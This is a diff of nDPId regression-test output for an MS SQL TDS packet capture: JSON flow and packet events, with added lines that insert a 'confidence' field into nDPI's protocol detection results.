 00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":425,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":425,"pkt_l4_len":391,"ts_msec":1259762477536,"pkt":"ABI\/\/61OABI\/\/6gdCABFAAGb5atAAIAGj9IKb29vCgAAAR5hBZmoWkXE76JT4VAY\/ohFLgAAAwkBcwAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAEABwAF8AUwBlAHQAQgBvAGcAdQBzAFMAYQBtAHAAbABlAAAAD0AAQgBvAGcAdQBzAEQAZQB0AGEAaQBsAHMASQBEAAAmCAhFIwEAAAAAAA5AAEIAbwBnAHUAcwBTAHQAYQB0AHUAcwBJAEQAACYICAUAAAAAAAAAC0AAUgBlAHMAdQBsAHQAQwBvAGQAZQAA5wIACQTQADT\/\/wpAAFIAZQBzAHUAbAB0AE0AcwBnAADnAgAJBNAANP\/\/CkAARQByAHIAbwByAEMAbwBkAGUAAOcCAAkE0AA0\/\/8JQABFAHIAcgBvAHIATQBzAGcAAOcCAAkE0AA0\/\/8YQABFAHgAYQBtAHAAbABlAEIAbwBnAHUAcwBHAGUAbgBlAHIAYQB0AGUAZABJAEQAAOcCAAkE0AA0\/\/8MQABFAHgAYQBtAHAAbABlAFQAeQBwAGUAACYEBAEAAAA="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1259762482456,"pkt":"ABI\/\/61OABI\/\/6gdCABFAACA6VZAAIAGjUIKb29vCgAAASK4BZmoWq7z77DJrlAY\/kP\/5gAAAwkAWAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAGwBwAF8ARwBlAHQATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAFIAbwB3AEMAbwB1AG4AdAAAAA=="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7440000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00741{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"ts_msec":1278068444584,"pkt":"ADAFzckRADAFzck9CABFAAECT7tAAIAGJlwKb29vCgAAAScPBZlFt6JP51MRDlAY+rgBzgAAAwEA2gAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAzIhEAVUR3ZoiZqrvM3e7\/AAAfAADnAAAJBAABMgAAAACnJAAJBAABMiQAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqAAAmBAQBAAAAAAAmCAgtAAAAAAAAAAAApQwADAABI0VniavN7\/7cupgAACYEBGwAAAA="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00720{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"ts_msec":1278068444614,"pkt":"ADAFzckRADAFzck9CABFAADvT85AAIAGJlwKb29vCgAAAStnBZlFt6Pw51OjJ1AY\/N33oQAAAwkAxwAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAAESIzRFVmd4iZqrvM3e7\/AAAfAADnCgAJBAABMgoAQgBvAGcAdQBzAAAAHwAAJgQEAQAAAAAAJggILQAAAAAAAAAAAKUcABwAASNFZ4mrze\/ty6mHZUMhASNFZ4mrze\/ty6mHZQAAJgQEEgAAAA=="}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00813{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":322,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":322,"pkt_l4_len":288,"ts_msec":1278068444650,"pkt":"ADAFzckRADAFzck9CABFAAE0T9pAAIAGJgsKb29vCgAAAVbOBZn+D2d0K1+fyFAY+5tcOQAAAwkBDAAAAQAXAHAAcgBvAGMAXwBGAGUAdABjAGgATQB5AEUAeABhAG0AcABsAGUARABhAHQAYQAAAAAAJBAQASNFZ4mrze8BI0VniavN7wAA5wAACQQAATIAAAAA5woACQQAATIKAEIATwBHAFUAUwAAAGgBAQAAAG8ICP7\/\/\/8AAAAAAAAmBAQAAAAAAAAmBAQAAAAAAAAmBAAAACQQAAAAaAEAAAAmAQEAAAClHAAcAAEjRWeJq83vASNFZ4mrze8BI0VniavN7wEjRWcAACYEAAAAJgEBAQAAJgQEAABQAAAAJggILQAAAAAAAAAAACYBAQEAAGgBAQAAAOcCAAkEAAEy\/\/8AASYBAA=="}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"ts_msec":1278068444666,"pkt":"ADAFzckRADAFzck9CABFAAFoT95AAIAGJdMKb29vCgAAAYI1BZl4aO73Gv+xN1AY\/dgFJQAAAwkBQAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAHQBkAGIAbwAuAHAAcgBvAGMAXwBHAGUAdABNAHkAUwBhAG0AcABsAGUARABhAHQAYQBJAHQAZQBtAHMAAAANQABTAGEAbQBwAGwAZQBJAHQAZQBtAEkAZAAAJBAQZhrDThSiU0infucGD\/\/\/BwdAAEQAYQB0AGEASQBkAADnAgAJBBAAAP\/\/DUAARABhAHQAYQBJAHQAZQBtAFQAeQBwAGUAACQQEJtFubyog2RFsdPp4ZhHj04IQABUAGEAYgBsAGUASQBkAADnAgAJBBAAAP\/\/DUAATQBhAHgARgBlAHQAYwBoAFMAaQB6AGUAACYEBGQAAAASQABTAG8AbQBlAE8AdABoAGUAcgBTAGEAbQBwAGwAZQBJAGQAACYEBAAAAAA="}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7440000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
